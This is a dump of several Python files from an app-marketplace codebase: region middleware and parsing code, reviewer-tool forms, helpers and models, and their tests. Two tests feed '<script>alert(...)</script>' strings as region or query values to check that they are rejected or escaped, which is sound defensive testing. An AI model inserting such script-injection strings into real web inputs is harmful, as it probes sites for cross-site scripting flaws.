@mock.patch.object(settings, 'LANGUAGE_URL_MAP',
dict([x.lower(), x] for x in _langs))
class TestRegionMiddleware(amo.tests.TestCase):
def test_lang_set_with_region(self):
for region in ('restofworld', 'us', 'br'):
r = self.client.get('/robots.txt?region=%s' % region)
if region == 'restofworld':
# Set cookie for first time only.
eq_(r.cookies['lang'].value, settings.LANGUAGE_CODE + ',')
else:
eq_(r.cookies.get('lang'), None)
eq_(r.context['request'].LANG, settings.LANGUAGE_CODE)
def test_no_api_cookie(self):
res = self.client.get('/api/v1/apps/schema/?region=restofworld')
ok_(not res.cookies)
@mock.patch('mkt.regions.set_region')
def test_accept_good_region(self, set_region):
for region, region_cls in mkt.regions.REGIONS_CHOICES:
self.client.get('/api/v1/apps/?region=%s' % region)
set_region.assert_called_with(region_cls)
@mock.patch('mkt.regions.set_region')
def test_ignore_bad_region(self, set_region):
# When no region is specified or the region is invalid, we use
# whichever region satisfies `Accept-Language`.
for region in ('', 'BR', '<script>alert("ballin")</script>'):
self.client.get('/api/v1/apps/?region=%s' % region,
HTTP_ACCEPT_LANGUAGE='fr')
set_region.assert_called_with(mkt.regions.RESTOFWORLD)
@mock.patch('mkt.regions.set_region')
def test_handles_worldwide_as_restofworld(self, set_region):
self.client.get('/api/v1/apps/?region=worldwide')
set_region.assert_called_with(mkt.regions.RESTOFWORLD)
@mock.patch('mkt.regions.set_region')
@mock.patch('mkt.regions.middleware.RegionMiddleware.region_from_request')
def test_url_param_override(self, mock_rfr, set_region):
self.client.get('/api/v1/apps/?region=br')
set_region.assert_called_with(mkt.regions.BR)
assert not mock_rfr.called
@mock.patch('mkt.regions.set_region')
@mock.patch.object(settings, 'GEOIP_DEFAULT_VAL', 'restofworld')
def test_geoip_missing_restofworld(self, set_region):
""" Test for restofworld region """
# The remote address by default is 127.0.0.1
# Use 'sa-US' as the language to defeat the lanugage sniffer
# Note: This may be problematic should we ever offer
# apps in US specific derivation of SanskritRight.
self.client.get('/api/v1/apps/', HTTP_ACCEPT_LANGUAGE='sa-US')
set_region.assert_called_with(mkt.regions.RESTOFWORLD)
@mock.patch('mkt.regions.middleware.GeoIP.lookup')
@mock.patch('mkt.regions.set_region')
@mock.patch.object(settings, 'GEOIP_DEFAULT_VAL', 'restofworld')
def test_geoip_lookup_available(self, set_region, mock_lookup):
mock_lookup.return_value = 'br'
self.client.get('/api/v1/apps/', HTTP_ACCEPT_LANGUAGE='sa-US')
set_region.assert_called_with(mkt.regions.BR)
@mock.patch('mkt.regions.middleware.GeoIP.lookup')
@mock.patch('mkt.regions.set_region')
@mock.patch.object(settings, 'GEOIP_DEFAULT_VAL', 'restofworld')
def test_geoip_lookup_unavailable(self, set_region, mock_lookup):
lang = 'zz'
mock_lookup.return_value = lang
self.client.get('/api/v1/apps/', HTTP_ACCEPT_LANGUAGE='sa-US')
set_region.assert_called_with(mkt.regions.RESTOFWORLD)
@mock.patch('mkt.regions.set_region')
@mock.patch.object(settings, 'GEOIP_DEFAULT_VAL', 'us')
def test_geoip_missing_lang(self, set_region):
""" Test for US region """
self.client.get('/api/v1/apps/', REMOTE_ADDR='127.0.0.1')
set_region.assert_called_with(mkt.regions.US)
@mock.patch.object(settings, 'GEOIP_DEFAULT_VAL', 'us')
@mock.patch('socket.socket')
@mock.patch('mkt.regions.set_region')
def test_geoip_down(self, set_region, mock_socket):
""" Test that we fail gracefully if the GeoIP server is down. """
mock_socket.connect.side_effect = IOError
self.client.get('/api/v1/apps/', REMOTE_ADDR='127.0.0.1')
set_region.assert_called_with(mkt.regions.US)
@mock.patch.object(settings, 'GEOIP_DEFAULT_VAL', 'us')
@mock.patch('socket.socket')
@mock.patch('mkt.regions.set_region')
def test_geoip_timeout(self, set_region, mock_socket):
""" Test that we fail gracefully if the GeoIP server times out. """
mock_socket.return_value.connect.return_value = True
mock_socket.return_value.send.side_effect = socket.timeout
self.client.get('/api/v1/apps/', REMOTE_ADDR='127.0.0.1')
set_region.assert_called_with(mkt.regions.US)
@mock.patch('mkt.regions.middleware.GeoIP.lookup')
@mock.patch('mkt.regions.set_region')
@mock.patch.object(settings, 'GEOIP_DEFAULT_VAL', 'restofworld')
def test_geoip_gb(self, set_region, mock_lookup):
mock_lookup.return_value = 'gb'
self.client.get('/api/v1/apps/', HTTP_ACCEPT_LANGUAGE='sa-US')
set_region.assert_called_with(mkt.regions.UK)
class TestRegionMiddlewarePersistence(amo.tests.TestCase):
fixtures = fixture('user_999')
def test_save_region(self):
self.client.login(username='[email protected]', password='password')
self.client.get('/api/v1/apps/?region=br')
eq_(UserProfile.objects.get(pk=999).region, 'br')
########NEW FILE########
__FILENAME__ = test_utils_
# -*- coding: utf-8 -*-
from nose.tools import eq_
from mkt.constants import regions
from mkt.regions.utils import parse_region, remove_accents
def test_parse_region():
eq_(parse_region('restofworld'), regions.RESTOFWORLD)
eq_(parse_region('br'), regions.BR)
eq_(parse_region('brazil'), regions.BR)
eq_(parse_region('bRaZiL'), regions.BR)
eq_(parse_region('7'), regions.BR)
eq_(parse_region(7), regions.BR)
eq_(parse_region(regions.BR), regions.BR)
eq_(parse_region(''), None)
def test_parse_worldwide_region_as_restofworld():
eq_(parse_region('worldwide'), regions.RESTOFWORLD)
def test_remove_accents():
eq_(remove_accents(u'café'), u'cafe')
eq_(remove_accents(u'Équateur'), u'Equateur')
eq_(remove_accents(u'Pérou'), u'Perou')
eq_(remove_accents(u'Węgry'), u'Wegry')
# This hits the limitations of what's possible with built-in
# functions but shows that if the diacritic isn't found the
# string remains un-molested.
eq_(remove_accents(u'Włochy'), u'Włochy')
########NEW FILE########
__FILENAME__ = utils
import unicodedata
from mkt.constants import regions
def parse_region(region):
"""
Returns a region class definition given a slug, id, or class definition.
"""
if isinstance(region, type) and issubclass(region, regions.REGION):
return region
if str(region).isdigit():
# Look up the region by ID.
return regions.REGIONS_CHOICES_ID_DICT[int(region)]
else:
# Look up the region by slug.
region_by_slug = regions.REGION_LOOKUP.get(region)
if region_by_slug is not None:
return region_by_slug
# Look up the region by name.
region_lower = region.lower()
for region in regions.ALL_REGIONS:
if unicode(region.name).lower() == region_lower:
return region
def remove_accents(input_str):
"""Remove accents from input."""
nkfd_form = unicodedata.normalize('NFKD', unicode(input_str))
return u''.join([c for c in nkfd_form if not unicodedata.combining(c)])
########NEW FILE########
__FILENAME__ = forms
import logging
from django import forms
import happyforms
from tower import ugettext as _, ugettext_lazy as _lazy
import amo
from addons.models import AddonDeviceType
from editors.forms import NonValidatingChoiceField, ReviewLogForm
from editors.models import CannedResponse
from mkt.api.forms import CustomNullBooleanSelect
from mkt.reviewers.utils import ReviewHelper
from mkt.search.forms import ApiSearchForm
log = logging.getLogger('z.reviewers.forms')
# We set 'any' here since we need to default this field
# to PUBLIC if not specified for consumer pages.
STATUS_CHOICES = [('any', _lazy(u'Any Status'))]
for status in amo.WEBAPPS_UNLISTED_STATUSES + (amo.STATUS_PUBLIC,):
STATUS_CHOICES.append((amo.STATUS_CHOICES_API[status],
amo.MKT_STATUS_CHOICES[status]))
class ReviewAppForm(happyforms.Form):
comments = forms.CharField(widget=forms.Textarea(),
label=_lazy(u'Comments:'))
canned_response = NonValidatingChoiceField(required=False)
action = forms.ChoiceField(widget=forms.RadioSelect())
device_types = forms.CharField(required=False,
label=_lazy(u'Device Types:'))
browsers = forms.CharField(required=False,
label=_lazy(u'Browsers:'))
device_override = forms.TypedMultipleChoiceField(
choices=[(k, v.name) for k, v in amo.DEVICE_TYPES.items()],
coerce=int, label=_lazy(u'Device Type Override:'),
widget=forms.CheckboxSelectMultiple, required=False)
notify = forms.BooleanField(
required=False, label=_lazy(u'Notify me the next time the manifest is '
u'updated. (Subsequent updates will not '
u'generate an email)'))
is_tarako = forms.BooleanField(
required=False, label=_lazy(u'This app works on Tarako devices.'))
def __init__(self, *args, **kw):
self.helper = kw.pop('helper')
self.type = kw.pop('type', amo.CANNED_RESPONSE_APP)
super(ReviewAppForm, self).__init__(*args, **kw)
# We're starting with an empty one, which will be hidden via CSS.
canned_choices = [['', [('', _('Choose a canned response...'))]]]
responses = CannedResponse.objects.filter(type=self.type)
# Loop through the actions.
for k, action in self.helper.actions.iteritems():
action_choices = [[c.response, c.name] for c in responses
if c.sort_group and k in c.sort_group.split(',')]
# Add the group of responses to the canned_choices array.
if action_choices:
canned_choices.append([action['label'], action_choices])
# Now, add everything not in a group.
for r in responses:
if not r.sort_group:
canned_choices.append([r.response, r.name])
self.fields['canned_response'].choices = canned_choices
self.fields['action'].choices = [(k, v['label']) for k, v
in self.helper.actions.items()]
device_types = AddonDeviceType.objects.filter(
addon=self.helper.addon).values_list('device_type', flat=True)
if device_types:
self.initial['device_override'] = device_types
self.initial['is_tarako'] = (
self.helper.addon.tags.filter(tag_text='tarako').exists())
def is_valid(self):
result = super(ReviewAppForm, self).is_valid()
if result:
self.helper.set_data(self.cleaned_data)
return result
def get_review_form(data, files, request=None, addon=None, version=None,
attachment_formset=None):
helper = ReviewHelper(request=request, addon=addon, version=version,
attachment_formset=attachment_formset)
return ReviewAppForm(data=data, files=files, helper=helper)
class ReviewAppLogForm(ReviewLogForm):
def __init__(self, *args, **kwargs):
super(ReviewAppLogForm, self).__init__(*args, **kwargs)
self.fields['search'].widget.attrs = {
# L10n: Descript of what can be searched for.
'placeholder': _lazy(u'app, reviewer, or comment'),
'size': 30}
class ApiReviewersSearchForm(ApiSearchForm):
status = forms.ChoiceField(required=False, choices=STATUS_CHOICES,
label=_lazy(u'Status'))
has_editor_comment = forms.NullBooleanField(
required=False,
label=_lazy(u'Has Editor Comment'),
widget=CustomNullBooleanSelect)
has_info_request = forms.NullBooleanField(
required=False,
label=_lazy(u'More Info Requested'),
widget=CustomNullBooleanSelect)
is_escalated = forms.NullBooleanField(
required=False,
label=_lazy(u'Escalated'),
widget=CustomNullBooleanSelect)
is_tarako = forms.NullBooleanField(
required=False,
label=_lazy(u'Tarako-ready'),
widget=CustomNullBooleanSelect)
def __init__(self, *args, **kwargs):
super(ApiReviewersSearchForm, self).__init__(*args, **kwargs)
# Mobile form, to render, expects choices from the Django field.
BOOL_CHOICES = ((u'', _lazy('Unknown')),
(u'true', _lazy('Yes')),
(u'false', _lazy('No')))
for field_name, field in self.fields.iteritems():
if isinstance(field, forms.NullBooleanField):
self.fields[field_name].choices = BOOL_CHOICES
def clean_status(self):
status = self.cleaned_data['status']
if status == 'any':
return 'any'
return amo.STATUS_CHOICES_API_LOOKUP.get(status, amo.STATUS_PENDING)
class ApproveRegionForm(happyforms.Form):
"""TODO: Use a DRF serializer."""
approve = forms.BooleanField(required=False)
def __init__(self, *args, **kw):
self.app = kw.pop('app')
self.region = kw.pop('region')
super(ApproveRegionForm, self).__init__(*args, **kw)
def save(self):
approved = self.cleaned_data['approve']
if approved:
status = amo.STATUS_PUBLIC
# Make it public in the previously excluded region.
self.app.addonexcludedregion.filter(
region=self.region.id).delete()
else:
status = amo.STATUS_REJECTED
value, changed = self.app.geodata.set_status(
self.region, status, save=True)
if changed:
self.app.save()
########NEW FILE########
__FILENAME__ = helpers
import urlparse
from django.core.urlresolvers import reverse
from django.utils.encoding import smart_str
import jinja2
from jingo import register
from tower import ugettext as _, ugettext_lazy as _lazy
import mkt
from access import acl
from amo.helpers import impala_breadcrumbs
from mkt.developers.helpers import mkt_page_title
from mkt.reviewers.utils import (AppsReviewing, clean_sort_param,
create_sort_link, device_queue_search)
@register.function
@jinja2.contextfunction
def reviewers_breadcrumbs(context, queue=None, items=None):
"""
Wrapper function for ``breadcrumbs``. Prepends 'Editor Tools'
breadcrumbs.
**queue**
Explicit queue type to set.
**items**
list of [(url, label)] to be inserted after Add-on.
"""
crumbs = [(reverse('reviewers.home'), _('Reviewer Tools'))]
if queue:
queues = {'pending': _('Apps'),
'rereview': _('Re-reviews'),
'updates': _('Updates'),
'escalated': _('Escalations'),
'device': _('Device'),
'moderated': _('Moderated Reviews'),
'reviewing': _('Reviewing'),
'region': _('Regional Queues')}
if items:
url = reverse('reviewers.apps.queue_%s' % queue)
else:
# The Addon is the end of the trail.
url = None
crumbs.append((url, queues[queue]))
if items:
crumbs.extend(items)
return impala_breadcrumbs(context, crumbs, add_default=True)
@register.function
@jinja2.contextfunction
def reviewers_page_title(context, title=None, addon=None):
if addon:
title = u'%s | %s' % (title, addon.name)
else:
section = _lazy('Reviewer Tools')
title = u'%s | %s' % (title, section) if title else section
return mkt_page_title(context, title)
@register.function
@jinja2.contextfunction
def queue_tabnav(context):
"""
Returns tuple of tab navigation for the queue pages.
Each tuple contains three elements: (url, tab_code, tab_text)
"""
request = context['request']
counts = context['queue_counts']
apps_reviewing = AppsReviewing(request).get_apps()
# Apps.
if acl.action_allowed(request, 'Apps', 'Review'):
rv = [
(reverse('reviewers.apps.queue_pending'), 'pending',
_('Apps ({0})', counts['pending']).format(counts['pending'])),
(reverse('reviewers.apps.queue_rereview'), 'rereview',
_('Re-reviews ({0})', counts['rereview']).format(
counts['rereview'])),
(reverse('reviewers.apps.queue_updates'), 'updates',
_('Updates ({0})', counts['updates']).format(counts['updates'])),
]
if acl.action_allowed(request, 'Apps', 'ReviewEscalated'):
rv.append((reverse('reviewers.apps.queue_escalated'), 'escalated',
_('Escalations ({0})', counts['escalated']).format(
counts['escalated'])))
rv.extend([
(reverse('reviewers.apps.queue_moderated'), 'moderated',
_('Moderated Reviews ({0})', counts['moderated'])
.format(counts['moderated'])),
(reverse('reviewers.apps.apps_reviewing'), 'reviewing',
_('Reviewing ({0})').format(len(apps_reviewing))),
])
if acl.action_allowed(request, 'Apps', 'ReviewRegionCN'):
url_ = reverse('reviewers.apps.queue_region',
args=[mkt.regions.CN.slug])
rv.append((url_, 'region',
_('China ({0})').format(counts['region_cn'])))
else:
rv = []
if 'pro' in request.GET:
device_srch = device_queue_search(request)
rv.append((reverse('reviewers.apps.queue_device'), 'device',
_('Device ({0})').format(device_srch.count()),))
return rv
@register.function
@jinja2.contextfunction
def logs_tabnav(context):
"""
Returns tuple of tab navigation for the log pages.
Each tuple contains three elements: (named url, tab_code, tab_text)
"""
rv = [
('reviewers.apps.logs', 'apps', _('Reviews'))
]
return rv
@register.function
@jinja2.contextfunction
def sort_link(context, pretty_name, sort_field):
"""Get table header sort links.
pretty_name -- name displayed on table header
sort_field -- name of get parameter, referenced to in views
"""
request = context['request']
sort, order = clean_sort_param(request)
# Copy search/filter GET parameters.
get_params = [(k, v) for k, v in
urlparse.parse_qsl(smart_str(request.META['QUERY_STRING']))
if k not in ('sort', 'order')]
return create_sort_link(pretty_name, sort_field, get_params,
sort, order)
########NEW FILE########
__FILENAME__ = models
from django.db import models
import amo
from apps.addons.models import Addon
from apps.editors.models import CannedResponse, EscalationQueue, RereviewQueue
class AppCannedResponseManager(amo.models.ManagerBase):
def get_query_set(self):
qs = super(AppCannedResponseManager, self).get_query_set()
return qs.filter(type=amo.CANNED_RESPONSE_APP)
class AppCannedResponse(CannedResponse):
objects = AppCannedResponseManager()
class Meta:
proxy = True
def cleanup_queues(sender, instance, **kwargs):
RereviewQueue.objects.filter(addon=instance).delete()
EscalationQueue.objects.filter(addon=instance).delete()
models.signals.post_delete.connect(cleanup_queues, sender=Addon,
dispatch_uid='queue-addon-cleanup')
########NEW FILE########
__FILENAME__ = serializers
from rest_framework import serializers
from mkt.search.serializers import ESAppSerializer
from mkt.webapps.models import Webapp
class ReviewingSerializer(serializers.ModelSerializer):
class Meta:
model = Webapp
fields = ('resource_uri', )
resource_uri = serializers.HyperlinkedRelatedField(view_name='app-detail',
read_only=True,
source='*')
SEARCH_FIELDS = [u'device_types', u'id', u'is_escalated', u'is_packaged',
u'name', u'premium_type', u'price', u'slug', u'status']
class ReviewersESAppSerializer(ESAppSerializer):
latest_version = serializers.Field(source='es_data.latest_version')
is_escalated = serializers.BooleanField()
class Meta(ESAppSerializer.Meta):
fields = SEARCH_FIELDS + ['latest_version', 'is_escalated']
########NEW FILE########
__FILENAME__ = test_forms
from django.conf import settings
from django.core.files.uploadedfile import SimpleUploadedFile
from mock import patch
from nose.tools import eq_
import amo
import amo.tests
from mkt.comm.forms import CommAttachmentForm
@patch.object(settings, 'MAX_REVIEW_ATTACHMENT_UPLOAD_SIZE', 1024)
class TestReviewAppAttachmentForm(amo.tests.TestCase):
def setUp(self):
self.max_size = settings.MAX_REVIEW_ATTACHMENT_UPLOAD_SIZE
def post_data(self, **kwargs):
post_data = {
'description': 'My Test File'
}
post_data.update(kwargs)
return post_data
def file_data(self, size=1024):
file_data = {
'attachment': None
}
if size:
file_data['attachment'] = SimpleUploadedFile('bacon.txt',
' ' * size)
return file_data
def test_no_attachment(self):
file_data = self.file_data(size=0)
self.check_valid(False, file_data=file_data)
def test_no_description(self):
post_data = self.post_data(description=None)
self.check_valid(True, post_data=post_data)
def test_attachment_okay(self):
file_data = self.file_data(size=self.max_size)
self.check_valid(True, file_data=file_data)
def test_attachment_too_large(self):
file_data = self.file_data(size=self.max_size + 1)
self.check_valid(False, file_data=file_data)
def check_valid(self, valid, post_data=None, file_data=None):
if not post_data:
post_data = self.post_data()
if not file_data:
file_data = self.file_data()
form = CommAttachmentForm(post_data, file_data)
eq_(form.is_valid(), valid)
########NEW FILE########
__FILENAME__ = test_tasks
import datetime
from django.conf import settings
import mock
from nose.tools import eq_
import amo
from abuse.models import AbuseReport
from amo.tasks import find_abuse_escalations, find_refund_escalations
from amo.tests import app_factory
from devhub.models import AppLog
from editors.models import EscalationQueue
from stats.models import Contribution
from users.models import UserProfile
from mkt.prices.models import AddonPurchase, Refund
class TestAbuseEscalationTask(amo.tests.TestCase):
fixtures = ['base/users']
def setUp(self):
self.app = app_factory(name='XXX')
eq_(EscalationQueue.objects.filter(addon=self.app).count(), 0)
patcher = mock.patch.object(settings, 'TASK_USER_ID', 4043307)
patcher.start()
self.addCleanup(patcher.stop)
def test_no_abuses_no_history(self):
find_abuse_escalations(self.app.id)
eq_(EscalationQueue.objects.filter(addon=self.app).count(), 0)
def test_abuse_no_history(self):
for x in range(2):
AbuseReport.objects.create(addon=self.app)
find_abuse_escalations(self.app.id)
eq_(EscalationQueue.objects.filter(addon=self.app).count(), 1)
def test_abuse_already_escalated(self):
for x in range(2):
AbuseReport.objects.create(addon=self.app)
find_abuse_escalations(self.app.id)
eq_(EscalationQueue.objects.filter(addon=self.app).count(), 1)
find_abuse_escalations(self.app.id)
eq_(EscalationQueue.objects.filter(addon=self.app).count(), 1)
def test_abuse_cleared_not_escalated(self):
for x in range(2):
ar = AbuseReport.objects.create(addon=self.app)
ar.created = datetime.datetime.now() - datetime.timedelta(days=1)
ar.save()
find_abuse_escalations(self.app.id)
eq_(EscalationQueue.objects.filter(addon=self.app).count(), 1)
# Simulate a reviewer clearing an escalation... remove app from queue,
# and write a log.
EscalationQueue.objects.filter(addon=self.app).delete()
amo.log(amo.LOG.ESCALATION_CLEARED, self.app, self.app.current_version,
details={'comments': 'All clear'})
eq_(EscalationQueue.objects.filter(addon=self.app).count(), 0)
# Task will find it again but not add it again.
find_abuse_escalations(self.app.id)
eq_(EscalationQueue.objects.filter(addon=self.app).count(), 0)
def test_older_abuses_cleared_then_new(self):
for x in range(2):
ar = AbuseReport.objects.create(addon=self.app)
ar.created = datetime.datetime.now() - datetime.timedelta(days=1)
ar.save()
find_abuse_escalations(self.app.id)
eq_(EscalationQueue.objects.filter(addon=self.app).count(), 1)
# Simulate a reviewer clearing an escalation... remove app from queue,
# and write a log.
EscalationQueue.objects.filter(addon=self.app).delete()
amo.log(amo.LOG.ESCALATION_CLEARED, self.app, self.app.current_version,
details={'comments': 'All clear'})
eq_(EscalationQueue.objects.filter(addon=self.app).count(), 0)
# Task will find it again but not add it again.
find_abuse_escalations(self.app.id)
eq_(EscalationQueue.objects.filter(addon=self.app).count(), 0)
# New abuse reports that come in should re-add to queue.
for x in range(2):
AbuseReport.objects.create(addon=self.app)
find_abuse_escalations(self.app.id)
eq_(EscalationQueue.objects.filter(addon=self.app).count(), 1)
def test_already_escalated_for_other_still_logs(self):
# Add app to queue for high refunds.
EscalationQueue.objects.create(addon=self.app)
amo.log(amo.LOG.ESCALATED_HIGH_REFUNDS, self.app,
self.app.current_version, details={'comments': 'hi refunds'})
# Set up abuses.
for x in range(2):
AbuseReport.objects.create(addon=self.app)
find_abuse_escalations(self.app.id)
# Verify it logged the high abuse reports.
action = amo.LOG.ESCALATED_HIGH_ABUSE
assert AppLog.objects.filter(
addon=self.app, activity_log__action=action.id).exists(), (
u'Expected high abuse to be logged')
class TestRefundsEscalationTask(amo.tests.TestCase):
fixtures = ['base/users']
def setUp(self):
self.app = app_factory(name='XXX')
self.user1, self.user2, self.user3 = UserProfile.objects.all()[:3]
patcher = mock.patch.object(settings, 'TASK_USER_ID', 4043307)
patcher.start()
self.addCleanup(patcher.stop)
eq_(EscalationQueue.objects.filter(addon=self.app).count(), 0)
def _purchase(self, user=None, created=None):
ap1 = AddonPurchase.objects.create(user=user or self.user1,
addon=self.app)
if created:
ap1.update(created=created)
def _refund(self, user=None, created=None):
contribution = Contribution.objects.create(addon=self.app,
user=user or self.user1)
ref = Refund.objects.create(contribution=contribution,
user=user or self.user1)
if created:
ref.update(created=created)
# Needed because these tests can run in the same second and the
# refund detection task depends on timestamp logic for when to
# escalate.
applog = AppLog.objects.all().order_by('-created', '-id')[0]
applog.update(created=created)
def test_multiple_refunds_same_user(self):
self._purchase(self.user1)
self._refund(self.user1)
self._refund(self.user1)
eq_(Refund.recent_refund_ratio(
self.app.id, datetime.datetime.now() - datetime.timedelta(days=1)),
1.0)
def test_no_refunds(self):
find_refund_escalations(self.app.id)
eq_(EscalationQueue.objects.filter(addon=self.app).count(), 0)
def test_refunds(self):
self._purchase(self.user1)
self._purchase(self.user2)
self._refund(self.user1)
eq_(EscalationQueue.objects.filter(addon=self.app).count(), 1)
def test_refunds_already_escalated(self):
self._purchase(self.user1)
self._purchase(self.user2)
self._refund(self.user1)
eq_(EscalationQueue.objects.filter(addon=self.app).count(), 1)
# Task was run on Refund.post_save, re-run task to make sure we don't
# escalate again.
find_refund_escalations(self.app.id)
eq_(EscalationQueue.objects.filter(addon=self.app).count(), 1)
def test_refunds_cleared_not_escalated(self):
stamp = datetime.datetime.now() - datetime.timedelta(days=2)
self._purchase(self.user1, stamp)
self._purchase(self.user2, stamp)
self._refund(self.user1, stamp)
# Simulate a reviewer clearing an escalation...
# remove app from queue and write a log.
EscalationQueue.objects.filter(addon=self.app).delete()
amo.log(amo.LOG.ESCALATION_CLEARED, self.app, self.app.current_version,
details={'comments': 'All clear'})
eq_(EscalationQueue.objects.filter(addon=self.app).count(), 0)
# Task will find it again but not add it again.
find_refund_escalations(self.app.id)
eq_(EscalationQueue.objects.filter(addon=self.app).count(), 0)
def test_older_refund_escalations_then_new(self):
stamp = datetime.datetime.now() - datetime.timedelta(days=2)
self._purchase(self.user1, stamp)
self._purchase(self.user2, stamp)
# Triggers 33% for refund / purchase ratio.
self._refund(self.user1, stamp)
# Simulate a reviewer clearing an escalation...
# remove app from queue and write a log.
EscalationQueue.objects.filter(addon=self.app).delete()
amo.log(amo.LOG.ESCALATION_CLEARED, self.app, self.app.current_version,
details={'comments': 'All ok'})
eq_(EscalationQueue.objects.filter(addon=self.app).count(), 0)
# Task will find it again but not add it again.
find_refund_escalations(self.app.id)
eq_(EscalationQueue.objects.filter(addon=self.app).count(), 0)
# Issue another refund, which should trigger another escalation.
self._purchase(self.user3)
self._refund(self.user3)
eq_(EscalationQueue.objects.filter(addon=self.app).count(), 1)
def test_already_escalated_for_other_still_logs(self):
# Add app to queue for abuse reports.
EscalationQueue.objects.create(addon=self.app)
amo.log(amo.LOG.ESCALATED_HIGH_ABUSE, self.app,
self.app.current_version, details={'comments': 'abuse'})
# Set up purchases.
stamp = datetime.datetime.now() - datetime.timedelta(days=2)
self._purchase(self.user1, stamp)
self._purchase(self.user2, stamp)
# Triggers 33% for refund / purchase ratio.
self._refund(self.user1, stamp)
# Verify it logged the high refunds.
action = amo.LOG.ESCALATED_HIGH_REFUNDS
assert AppLog.objects.filter(
addon=self.app, activity_log__action=action.id).exists(), (
u'Expected high refunds to be logged')
########NEW FILE########
__FILENAME__ = test_utils_
# -*- coding: utf8 -*-
import amo.tests
from mkt.reviewers.utils import create_sort_link
class TestCreateSortLink(amo.tests.TestCase):
"""Test that the sortable table headers' have URLs created correctly."""
def test_sort_asc_created(self):
"""
Test that name's link sorts by asc if already sorting by created.
"""
link = create_sort_link('Name', 'name', [('text_query', 'irrel')],
'created', 'desc')
assert 'sort=name' in link
assert 'order=asc' in link
assert 'text_query=irrel' in link
def test_sort_invert_created(self):
"""
Test that created's link inverts order if already sorting by created.
"""
link = create_sort_link('Waiting Time', 'created',
[('text_query', 'guybrush')], 'created',
'asc')
assert 'sort=created' in link
assert 'order=desc' in link
assert 'text_query=guybrush' in link
link = create_sort_link('Waiting Time', 'created', [], 'created',
'desc')
assert 'order=asc' in link
def test_no_xss(self):
link = create_sort_link('Waiting Time', 'created',
[('script', '<script>alert("BIB");</script>')],
'created', 'asc')
assert '<script>' not in link
def test_unicode(self):
link = create_sort_link('Name', 'name', [('text_query', 'Feliz Año')],
'created', 'desc')
assert 'sort=name' in link
assert 'order=asc' in link
assert 'text_query=Feliz+A%C3%B1o' in link
########NEW FILE########
__FILENAME__ = test_views
# -*- coding: utf-8 -*-
import datetime
import json
import os
import time
from itertools import cycle
from os import path
from django.conf import settings
from django.core import mail
from django.core.files.storage import default_storage as storage
from django.core.urlresolvers import reverse
from django.test.client import RequestFactory
from django.test.utils import override_settings
from django.utils import translation
import mock
import requests
from nose import SkipTest
from nose.tools import eq_, ok_
from pyquery import PyQuery as pq
from requests.structures import CaseInsensitiveDict
import amo
import amo.tests
from abuse.models import AbuseReport
from access.models import Group, GroupUser
from addons.models import AddonDeviceType
from amo.helpers import absolutify, urlparams
from amo.tests import (app_factory, check_links, days_ago, formset, initial,
req_factory_factory, user_factory, version_factory)
from amo.utils import isotime
from cache_nuggets.lib import Token
from devhub.models import ActivityLog, ActivityLogAttachment, AppLog
from editors.models import (CannedResponse, EscalationQueue, RereviewQueue,
ReviewerScore)
from files.models import File
from lib.crypto import packaged
from lib.crypto.tests import mock_sign
from reviews.models import Review, ReviewFlag
from tags.models import Tag
from users.models import UserProfile
from versions.models import Version
from zadmin.models import get_config, set_config
import mkt
import mkt.ratings
from mkt.comm.utils import create_comm_note
from mkt.constants import comm
from mkt.constants.features import FeatureProfile
from mkt.reviewers.views import (_do_sort, _progress, app_review, queue_apps,
route_reviewer)
from mkt.site.fixtures import fixture
from mkt.submit.tests.test_views import BasePackagedAppTest
from mkt.webapps.models import Webapp
from mkt.webapps.tests.test_models import PackagedFilesMixin
TEST_PATH = path.dirname(path.abspath(__file__))
ATTACHMENTS_DIR = path.abspath(path.join(TEST_PATH, '..', '..', 'comm',
'tests', 'attachments'))
class AttachmentManagementMixin(object):
def _attachment_management_form(self, num=1):
"""
Generate and return data for a management form for `num` attachments
"""
return {'attachment-TOTAL_FORMS': max(1, num),
'attachment-INITIAL_FORMS': 0,
'attachment-MAX_NUM_FORMS': 1000}
def _attachments(self, num):
"""Generate and return data for `num` attachments """
data = {}
files = ['bacon.jpg', 'bacon.txt']
descriptions = ['mmm, bacon', '']
if num > 0:
for n in xrange(num):
i = 0 if n % 2 else 1
attachment = open(path.join(ATTACHMENTS_DIR, files[i]), 'r+')
data.update({
'attachment-%d-attachment' % n: attachment,
'attachment-%d-description' % n: descriptions[i]
})
return data
class AppReviewerTest(amo.tests.TestCase):
fixtures = ['base/users']
def setUp(self):
self.login_as_editor()
def login_as_admin(self):
self.login('[email protected]')
def login_as_editor(self):
self.login('[email protected]')
def login_as_senior_reviewer(self):
self.client.logout()
user = UserProfile.objects.get(email='[email protected]')
self.grant_permission(user, 'Apps:Edit,Apps:ReviewEscalated,'
'Apps:ReviewPrivileged')
self.login_as_editor()
def check_actions(self, expected, elements):
"""Check the action buttons on the review page.
`expected` is a list of tuples containing action name and action form
value. `elements` is a PyQuery list of input elements.
"""
for idx, item in enumerate(expected):
text, form_value = item
e = elements.eq(idx)
eq_(e.parent().text(), text)
eq_(e.attr('name'), 'action')
eq_(e.val(), form_value)
class AccessMixin(object):
def test_403_for_non_editor(self, *args, **kwargs):
assert self.client.login(username='[email protected]',
password='password')
eq_(self.client.head(self.url).status_code, 403)
def test_302_for_anonymous(self, *args, **kwargs):
self.client.logout()
eq_(self.client.head(self.url).status_code, 302)
class SearchMixin(object):
def test_search_query(self):
# Light test to make sure queues can handle search queries.
res = self.client.get(self.url, {'text_query': 'test'})
eq_(res.status_code, 200)
class TestReviewersHome(AppReviewerTest, AccessMixin):
def setUp(self):
self.login_as_editor()
super(TestReviewersHome, self).setUp()
self.url = reverse('reviewers.home')
self.apps = [app_factory(name='Antelope',
status=amo.STATUS_PENDING),
app_factory(name='Bear',
status=amo.STATUS_PENDING),
app_factory(name='Cougar',
status=amo.STATUS_PENDING)]
self.packaged_app = app_factory(name='Dinosaur',
status=amo.STATUS_PUBLIC,
is_packaged=True)
version_factory(addon=self.packaged_app,
file_kw={'status': amo.STATUS_PENDING})
# Add a disabled app for good measure.
app_factory(name='Elephant', disabled_by_user=True,
status=amo.STATUS_PENDING)
# Escalate one app to make sure it doesn't affect stats.
escalated = app_factory(name='Eyelash Pit Viper',
status=amo.STATUS_PENDING)
EscalationQueue.objects.create(addon=escalated)
# Add a public app under re-review.
rereviewed = app_factory(name='Finch', status=amo.STATUS_PUBLIC)
rq = RereviewQueue.objects.create(addon=rereviewed)
rq.update(created=self.days_ago(1))
# Add an app with latest update deleted. It shouldn't affect anything.
app = app_factory(name='Great White Shark',
status=amo.STATUS_PUBLIC,
version_kw={'version': '1.0'},
is_packaged=True)
